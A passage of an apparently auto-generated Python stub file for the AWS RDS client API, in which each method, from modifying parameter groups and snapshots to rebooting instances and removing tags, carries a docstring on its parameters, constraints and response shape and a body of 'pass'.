'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def modify_db_parameter_group(DBParameterGroupName=None, Parameters=None):
"""
Modifies the parameters of a DB parameter group. To modify more than one parameter, submit a list of the following: ParameterName , ParameterValue , and ApplyMethod . A maximum of 20 parameters can be modified in a single request.
See also: AWS API Documentation
Examples
This example immediately changes the specified setting for the specified DB parameter group.
Expected Output:
:example: response = client.modify_db_parameter_group(
DBParameterGroupName='string',
Parameters=[
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
]
)
:type DBParameterGroupName: string
:param DBParameterGroupName: [REQUIRED]
The name of the DB parameter group.
Constraints:
Must be the name of an existing DB parameter group
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Parameters: list
:param Parameters: [REQUIRED]
An array of parameter names, values, and the apply method for the parameter update. At least one parameter name, value, and apply method must be supplied; subsequent arguments are optional. A maximum of 20 parameters can be modified in a single request.
Valid Values (for the application method): immediate | pending-reboot
Note
You can use the immediate value with dynamic parameters only. You can use the pending-reboot value for both dynamic and static parameters, and changes are applied when you reboot the DB instance without failover.
(dict) --This data type is used as a request parameter in the ModifyDBParameterGroup and ResetDBParameterGroup actions.
This data type is used as a response element in the DescribeEngineDefaultParameters and DescribeDBParameters actions.
ParameterName (string) --Specifies the name of the parameter.
ParameterValue (string) --Specifies the value of the parameter.
Description (string) --Provides a description of the parameter.
Source (string) --Indicates the source of the parameter value.
ApplyType (string) --Specifies the engine specific parameters type.
DataType (string) --Specifies the valid data type for the parameter.
AllowedValues (string) --Specifies the valid range of values for the parameter.
IsModifiable (boolean) --Indicates whether (true ) or not (false ) the parameter can be modified. Some parameters have security or operational implications that prevent them from being changed.
MinimumEngineVersion (string) --The earliest engine version to which the parameter can apply.
ApplyMethod (string) --Indicates when to apply parameter updates.
:rtype: dict
:return: {
'DBParameterGroupName': 'string'
}
"""
pass
def modify_db_snapshot(DBSnapshotIdentifier=None, EngineVersion=None):
"""
Updates a manual DB snapshot, which can be encrypted or not encrypted, with a new engine version. You can update the engine version to either a new major or minor engine version.
Amazon RDS supports upgrading a MySQL DB snapshot from MySQL 5.1 to MySQL 5.5.
See also: AWS API Documentation
:example: response = client.modify_db_snapshot(
DBSnapshotIdentifier='string',
EngineVersion='string'
)
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier of the DB snapshot to modify.
:type EngineVersion: string
:param EngineVersion: The engine version to update the DB snapshot to.
:rtype: dict
:return: {
'DBSnapshot': {
'DBSnapshotIdentifier': 'string',
'DBInstanceIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'AvailabilityZone': 'string',
'VpcId': 'string',
'InstanceCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'Iops': 123,
'OptionGroupName': 'string',
'PercentProgress': 123,
'SourceRegion': 'string',
'SourceDBSnapshotIdentifier': 'string',
'StorageType': 'string',
'TdeCredentialArn': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'DBSnapshotArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBSnapshot
DeleteDBSnapshot
"""
pass
def modify_db_snapshot_attribute(DBSnapshotIdentifier=None, AttributeName=None, ValuesToAdd=None, ValuesToRemove=None):
"""
Adds an attribute and values to, or removes an attribute and values from, a manual DB snapshot.
To share a manual DB snapshot with other AWS accounts, specify restore as the AttributeName and use the ValuesToAdd parameter to add a list of IDs of the AWS accounts that are authorized to restore the manual DB snapshot. Uses the value all to make the manual DB snapshot public, which means it can be copied or restored by all AWS accounts. Do not add the all value for any manual DB snapshots that contain private information that you don't want available to all AWS accounts. If the manual DB snapshot is encrypted, it can be shared, but only by specifying a list of authorized AWS account IDs for the ValuesToAdd parameter. You can't use all as a value for that parameter in this case.
To view which AWS accounts have access to copy or restore a manual DB snapshot, or whether a manual DB snapshot public or private, use the DescribeDBSnapshotAttributes API action.
See also: AWS API Documentation
Examples
This example adds the specified attribute for the specified DB snapshot.
Expected Output:
:example: response = client.modify_db_snapshot_attribute(
DBSnapshotIdentifier='string',
AttributeName='string',
ValuesToAdd=[
'string',
],
ValuesToRemove=[
'string',
]
)
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier for the DB snapshot to modify the attributes for.
:type AttributeName: string
:param AttributeName: [REQUIRED]
The name of the DB snapshot attribute to modify.
To manage authorization for other AWS accounts to copy or restore a manual DB snapshot, set this value to restore .
:type ValuesToAdd: list
:param ValuesToAdd: A list of DB snapshot attributes to add to the attribute specified by AttributeName .
To authorize other AWS accounts to copy or restore a manual snapshot, set this list to include one or more AWS account IDs, or all to make the manual DB snapshot restorable by any AWS account. Do not add the all value for any manual DB snapshots that contain private information that you don't want available to all AWS accounts.
(string) --
:type ValuesToRemove: list
:param ValuesToRemove: A list of DB snapshot attributes to remove from the attribute specified by AttributeName .
To remove authorization for other AWS accounts to copy or restore a manual snapshot, set this list to include one or more AWS account identifiers, or all to remove authorization for any AWS account to copy or restore the DB snapshot. If you specify all , an AWS account whose account ID is explicitly added to the restore attribute can still copy or restore the manual DB snapshot.
(string) --
:rtype: dict
:return: {
'DBSnapshotAttributesResult': {
'DBSnapshotIdentifier': 'string',
'DBSnapshotAttributes': [
{
'AttributeName': 'string',
'AttributeValues': [
'string',
]
},
]
}
}
:returns:
(string) --
"""
pass
def modify_db_subnet_group(DBSubnetGroupName=None, DBSubnetGroupDescription=None, SubnetIds=None):
"""
Modifies an existing DB subnet group. DB subnet groups must contain at least one subnet in at least two AZs in the region.
See also: AWS API Documentation
Examples
This example changes the specified setting for the specified DB subnet group.
Expected Output:
:example: response = client.modify_db_subnet_group(
DBSubnetGroupName='string',
DBSubnetGroupDescription='string',
SubnetIds=[
'string',
]
)
:type DBSubnetGroupName: string
:param DBSubnetGroupName: [REQUIRED]
The name for the DB subnet group. This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type DBSubnetGroupDescription: string
:param DBSubnetGroupDescription: The description for the DB subnet group.
:type SubnetIds: list
:param SubnetIds: [REQUIRED]
The EC2 subnet IDs for the DB subnet group.
(string) --
:rtype: dict
:return: {
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
}
}
:returns:
CreateDBSubnetGroup
ModifyDBSubnetGroup
DescribeDBSubnetGroups
DeleteDBSubnetGroup
"""
pass
def modify_event_subscription(SubscriptionName=None, SnsTopicArn=None, SourceType=None, EventCategories=None, Enabled=None):
"""
Modifies an existing RDS event notification subscription. Note that you cannot modify the source identifiers using this call; to change source identifiers for a subscription, use the AddSourceIdentifierToSubscription and RemoveSourceIdentifierFromSubscription calls.
You can see a list of the event categories for a given SourceType in the Events topic in the Amazon RDS User Guide or by using the DescribeEventCategories action.
See also: AWS API Documentation
Examples
This example changes the specified setting for the specified event notification subscription.
Expected Output:
:example: response = client.modify_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
Enabled=True|False
)
:type SubscriptionName: string
:param SubscriptionName: [REQUIRED]
The name of the RDS event notification subscription.
:type SnsTopicArn: string
:param SnsTopicArn: The Amazon Resource Name (ARN) of the SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType: The type of source that will be generating the events. For example, if you want to be notified of events generated by a DB instance, you would set this parameter to db-instance. if this value is not specified, all events are returned.
Valid values: db-instance | db-parameter-group | db-security-group | db-snapshot
:type EventCategories: list
:param EventCategories: A list of event categories for a SourceType that you want to subscribe to. You can see a list of the categories for a given SourceType in the Events topic in the Amazon RDS User Guide or by using the DescribeEventCategories action.
(string) --
:type Enabled: boolean
:param Enabled: A Boolean value; set to true to activate the subscription.
:rtype: dict
:return: {
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
}
}
:returns:
(string) --
"""
pass
def modify_option_group(OptionGroupName=None, OptionsToInclude=None, OptionsToRemove=None, ApplyImmediately=None):
"""
Modifies an existing option group.
See also: AWS API Documentation
Examples
The following example adds an option to an option group.
Expected Output:
:example: response = client.modify_option_group(
OptionGroupName='string',
OptionsToInclude=[
{
'OptionName': 'string',
'Port': 123,
'OptionVersion': 'string',
'DBSecurityGroupMemberships': [
'string',
],
'VpcSecurityGroupMemberships': [
'string',
],
'OptionSettings': [
{
'Name': 'string',
'Value': 'string',
'DefaultValue': 'string',
'Description': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'IsCollection': True|False
},
]
},
],
OptionsToRemove=[
'string',
],
ApplyImmediately=True|False
)
:type OptionGroupName: string
:param OptionGroupName: [REQUIRED]
The name of the option group to be modified.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type OptionsToInclude: list
:param OptionsToInclude: Options in this list are added to the option group or, if already present, the specified configuration is used to update the existing configuration.
(dict) --A list of all available options
OptionName (string) -- [REQUIRED]The configuration of options to include in a group.
Port (integer) --The optional port for the option.
OptionVersion (string) --The version for the option.
DBSecurityGroupMemberships (list) --A list of DBSecurityGroupMemebrship name strings used for this option.
(string) --
VpcSecurityGroupMemberships (list) --A list of VpcSecurityGroupMemebrship name strings used for this option.
(string) --
OptionSettings (list) --The option settings to include in an option group.
(dict) --Option settings are the actual settings being applied or configured for that option. It is used when you modify an option group or describe option groups. For example, the NATIVE_NETWORK_ENCRYPTION option has a setting called SQLNET.ENCRYPTION_SERVER that can have several different values.
Name (string) --The name of the option that has settings that you can set.
Value (string) --The current value of the option setting.
DefaultValue (string) --The default value of the option setting.
Description (string) --The description of the option setting.
ApplyType (string) --The DB engine specific parameter type.
DataType (string) --The data type of the option setting.
AllowedValues (string) --The allowed values of the option setting.
IsModifiable (boolean) --A Boolean value that, when true, indicates the option setting can be modified from the default.
IsCollection (boolean) --Indicates if the option setting is part of a collection.
:type OptionsToRemove: list
:param OptionsToRemove: Options in this list are removed from the option group.
(string) --
:type ApplyImmediately: boolean
:param ApplyImmediately: Indicates whether the changes should be applied immediately, or during the next maintenance window for each instance associated with the option group.
:rtype: dict
:return: {
'OptionGroup': {
'OptionGroupName': 'string',
'OptionGroupDescription': 'string',
'EngineName': 'string',
'MajorEngineVersion': 'string',
'Options': [
{
'OptionName': 'string',
'OptionDescription': 'string',
'Persistent': True|False,
'Permanent': True|False,
'Port': 123,
'OptionVersion': 'string',
'OptionSettings': [
{
'Name': 'string',
'Value': 'string',
'DefaultValue': 'string',
'Description': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'IsCollection': True|False
},
],
'DBSecurityGroupMemberships': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroupMemberships': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
]
},
],
'AllowsVpcAndNonVpcInstanceMemberships': True|False,
'VpcId': 'string',
'OptionGroupArn': 'string'
}
}
:returns:
ModifyDBInstance
RebootDBInstance
RestoreDBInstanceFromDBSnapshot
RestoreDBInstanceToPointInTime
"""
pass
def promote_read_replica(DBInstanceIdentifier=None, BackupRetentionPeriod=None, PreferredBackupWindow=None):
"""
Promotes a Read Replica DB instance to a standalone DB instance.
See also: AWS API Documentation
Examples
This example promotes the specified read replica and sets its backup retention period and preferred backup window.
Expected Output:
:example: response = client.promote_read_replica(
DBInstanceIdentifier='string',
BackupRetentionPeriod=123,
PreferredBackupWindow='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This value is stored as a lowercase string.
Constraints:
Must be the identifier for an existing Read Replica DB instance
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: mydbinstance
:type BackupRetentionPeriod: integer
:param BackupRetentionPeriod: The number of days to retain automated backups. Setting this parameter to a positive number enables backups. Setting this parameter to 0 disables automated backups.
Default: 1
Constraints:
Must be a value from 0 to 8
:type PreferredBackupWindow: string
:param PreferredBackupWindow: The daily time range during which automated backups are created if automated backups are enabled, using the BackupRetentionPeriod parameter.
Default: A 30-minute window selected at random from an 8-hour block of time per region. To see the time blocks available, see Adjusting the Preferred Maintenance Window in the Amazon RDS User Guide.
Constraints:
Must be in the format hh24:mi-hh24:mi .
Times should be in Universal Coordinated Time (UTC).
Must not conflict with the preferred maintenance window.
Must be at least 30 minutes.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def promote_read_replica_db_cluster(DBClusterIdentifier=None):
"""
Promotes a Read Replica DB cluster to a standalone DB cluster.
See also: AWS API Documentation
:example: response = client.promote_read_replica_db_cluster(
DBClusterIdentifier='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The identifier of the DB cluster Read Replica to promote. This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
Example: my-cluster-replica1
:rtype: dict
:return: {
'DBCluster': {
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
}
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def purchase_reserved_db_instances_offering(ReservedDBInstancesOfferingId=None, ReservedDBInstanceId=None, DBInstanceCount=None, Tags=None):
"""
Purchases a reserved DB instance offering.
See also: AWS API Documentation
Examples
This example purchases a reserved DB instance offering that matches the specified settings.
Expected Output:
:example: response = client.purchase_reserved_db_instances_offering(
ReservedDBInstancesOfferingId='string',
ReservedDBInstanceId='string',
DBInstanceCount=123,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ReservedDBInstancesOfferingId: string
:param ReservedDBInstancesOfferingId: [REQUIRED]
The ID of the Reserved DB instance offering to purchase.
Example: 438012d3-4052-4cc7-b2e3-8d3372e0e706
:type ReservedDBInstanceId: string
:param ReservedDBInstanceId: Customer-specified identifier to track this reservation.
Example: myreservationID
:type DBInstanceCount: integer
:param DBInstanceCount: The number of instances to reserve.
Default: 1
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:rtype: dict
:return: {
'ReservedDBInstance': {
'ReservedDBInstanceId': 'string',
'ReservedDBInstancesOfferingId': 'string',
'DBInstanceClass': 'string',
'StartTime': datetime(2015, 1, 1),
'Duration': 123,
'FixedPrice': 123.0,
'UsagePrice': 123.0,
'CurrencyCode': 'string',
'DBInstanceCount': 123,
'ProductDescription': 'string',
'OfferingType': 'string',
'MultiAZ': True|False,
'State': 'string',
'RecurringCharges': [
{
'RecurringChargeAmount': 123.0,
'RecurringChargeFrequency': 'string'
},
],
'ReservedDBInstanceArn': 'string'
}
}
"""
pass
def reboot_db_instance(DBInstanceIdentifier=None, ForceFailover=None):
"""
Rebooting a DB instance restarts the database engine service. A reboot also applies to the DB instance any modifications to the associated DB parameter group that were pending. Rebooting a DB instance results in a momentary outage of the instance, during which the DB instance status is set to rebooting. If the RDS instance is configured for MultiAZ, it is possible that the reboot will be conducted through a failover. An Amazon RDS event is created when the reboot is completed.
If your DB instance is deployed in multiple Availability Zones, you can force a failover from one AZ to the other during the reboot. You might force a failover to test the availability of your DB instance deployment or to restore operations to the original AZ after a failover occurs.
The time required to reboot is a function of the specific database engine's crash recovery process. To improve the reboot time, we recommend that you reduce database activities as much as possible during the reboot process to reduce rollback activity for in-transit transactions.
See also: AWS API Documentation
Examples
This example reboots the specified DB instance without forcing a failover.
Expected Output:
:example: response = client.reboot_db_instance(
DBInstanceIdentifier='string',
ForceFailover=True|False
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The DB instance identifier. This parameter is stored as a lowercase string.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type ForceFailover: boolean
:param ForceFailover: When true , the reboot will be conducted through a MultiAZ failover.
Constraint: You cannot specify true if the instance is not configured for MultiAZ.
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def remove_role_from_db_cluster(DBClusterIdentifier=None, RoleArn=None):
"""
Disassociates an Identity and Access Management (IAM) role from an Aurora DB cluster. For more information, see Authorizing Amazon Aurora to Access Other AWS Services On Your Behalf .
See also: AWS API Documentation
:example: response = client.remove_role_from_db_cluster(
DBClusterIdentifier='string',
RoleArn='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: [REQUIRED]
The name of the DB cluster to disassociate the IAM role from.
:type RoleArn: string
:param RoleArn: [REQUIRED]
The Amazon Resource Name (ARN) of the IAM role to disassociate from the Aurora DB cluster, for example arn:aws:iam::123456789012:role/AuroraAccessRole .
"""
pass
def remove_source_identifier_from_subscription(SubscriptionName=None, SourceIdentifier=None):
"""
Removes a source identifier from an existing RDS event notification subscription.
See also: AWS API Documentation
Examples
This example removes the specified source identifier from the specified DB event subscription.
Expected Output:
:example: response = client.remove_source_identifier_from_subscription(
SubscriptionName='string',
SourceIdentifier='string'
)
:type SubscriptionName: string
:param SubscriptionName: [REQUIRED]
The name of the RDS event notification subscription you want to remove a source identifier from.
:type SourceIdentifier: string
:param SourceIdentifier: [REQUIRED]
The source identifier to be removed from the subscription, such as the DB instance identifier for a DB instance or the name of a security group.
:rtype: dict
:return: {
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False,
'EventSubscriptionArn': 'string'
}
}
:returns:
(string) --
"""
pass
def remove_tags_from_resource(ResourceName=None, TagKeys=None):
"""
Removes metadata tags from an Amazon RDS resource.
For an overview on tagging an Amazon RDS resource, see Tagging Amazon RDS Resources .
See also: AWS API Documentation
Examples
This example removes the specified tag associated with the specified DB option group.
Expected Output:
:example: response = client.remove_tags_from_resource(
ResourceName='string',
TagKeys=[
'string',
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]
The Amazon RDS resource the tags will be removed from. This value is an Amazon Resource Name (ARN). For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
:type TagKeys: list
:param TagKeys: [REQUIRED]
The tag key (name) of the tag to be removed.
(string) --
:return: response = client.remove_tags_from_resource(
ResourceName='arn:aws:rds:us-east-1:992648334831:og:mydboptiongroup',
TagKeys=[
'MyKey',
],
)
print(response)
"""
pass
def reset_db_cluster_parameter_group(DBClusterParameterGroupName=None, ResetAllParameters=None, Parameters=None):
"""
Modifies the parameters of a DB cluster parameter group to the default value. To reset specific parameters submit a list of the following: ParameterName and ApplyMethod . To reset the entire DB cluster parameter group, specify the DBClusterParameterGroupName and ResetAllParameters parameters.
When resetting the entire group, dynamic parameters are updated immediately and static parameters are set to pending-reboot to take effect on the next DB instance restart or RebootDBInstance request. You must call RebootDBInstance for every DB instance in your DB cluster that you want the updated static parameter to apply to.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example resets all parameters for the specified DB cluster parameter group to their default values.
Expected Output:
:example: response = client.reset_db_cluster_parameter_group(
DBClusterParameterGroupName='string',
ResetAllParameters=True|False,
Parameters=[
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
